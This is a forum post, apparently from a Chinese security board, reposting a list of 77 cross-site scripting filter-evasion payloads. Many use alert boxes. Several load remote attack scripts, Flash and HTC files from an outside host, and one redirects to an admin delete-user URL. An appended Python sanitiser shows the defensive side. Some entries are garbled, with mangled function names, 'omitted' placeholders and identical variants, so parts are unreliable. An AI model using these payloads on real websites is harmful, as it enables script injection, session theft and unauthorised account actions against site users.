XSS Attack Summary

Posted on 2013-4-19 19:22:37
It seems t00ls has relatively few resources on XSS; I saw something good and copied it over, in case any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can slip your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add the JS code to an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
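A defensive counterpart to the list above, added here as an example (it is not part of the original post or of the cheat sheet it copies): a Python checker that normalises the entity encodings, control characters and padding the entries rely on before deciding whether an attribute value may be used, instead of matching the literal string "javascript:". SAFE_SCHEMES, URL_ATTRIBUTES and TEXT_ATTRIBUTES are assumed allow-lists to adapt per application.

```python
import html
import re

# Added example, not from the post: decide on a user-controlled attribute value after
# normalising the evasions catalogued above. The allow-list names below are assumptions.

# C0 controls (NUL, tab, LF, CR) that items 11-18 splice into "jav<TAB>ascript:";
# browsers drop them before matching the scheme, so the checker must drop them too.
_CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")
# Padding code points item 47 lists around the URL: space, NBSP, U+2000-U+200B, U+3000, U+FEFF.
_PAD = " \t\r\n\f\v\u00a0\u3000\ufeff" + "".join(chr(c) for c in range(0x2000, 0x200c))
# Allow-list of schemes a user-supplied URL may carry; everything else (javascript:,
# vbscript:, data:) is refused, which also covers item 4's mixed-case spelling.
SAFE_SCHEMES = {"http", "https", "mailto"}
# Attributes the list shows carrying a URL (items 31-36, 44-45, 54, 68-77).
URL_ATTRIBUTES = {"src", "href", "background", "dynsrc", "lowsrc", "action"}
# Attributes that carry plain text and may pass (still output-encoded on write).
TEXT_ATTRIBUTES = {"alt", "title", "class", "id", "width", "height"}
_SCHEME_RE = re.compile(r"([a-zA-Z][a-zA-Z0-9+.-]*):")


def normalize_url(value: str) -> str:
    """Undo entity encoding, control-char splitting and padding to get the URL a browser sees."""
    prev = None
    while prev != value:  # repeat until stable: &amp;#106; -> &#106; -> j (double encoding)
        # html.unescape applies HTML5 rules, so &#x6A without a ';' (items 9-10) decodes too
        prev, value = value, html.unescape(value)
    return _CONTROL_RE.sub("", value).strip(_PAD)


def url_is_safe(value: str) -> bool:
    """True for relative URLs and allow-listed schemes; javascript:/vbscript:/data: fail."""
    m = _SCHEME_RE.match(normalize_url(value))
    return m is None or m.group(1).lower() in SAFE_SCHEMES


def attribute_is_safe(name: str, value: str) -> bool:
    """Decide one attribute: handlers and STYLE are refused, URL attributes are normalised."""
    name = name.lower()
    if name.startswith("on"):       # item 21: "onload!#$%..." still begins with "on"
        return False
    if name == "style":             # items 46-53: expression() and url(javascript:) live here
        return False
    if name in URL_ATTRIBUTES:
        return url_is_safe(value)
    return name in TEXT_ATTRIBUTES  # anything unknown (srcdoc, formaction, ...) is refused
```

The check only decides whether a value may be used as a URL or attribute at all; the value must still be output-encoded for the HTML context it is written into.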
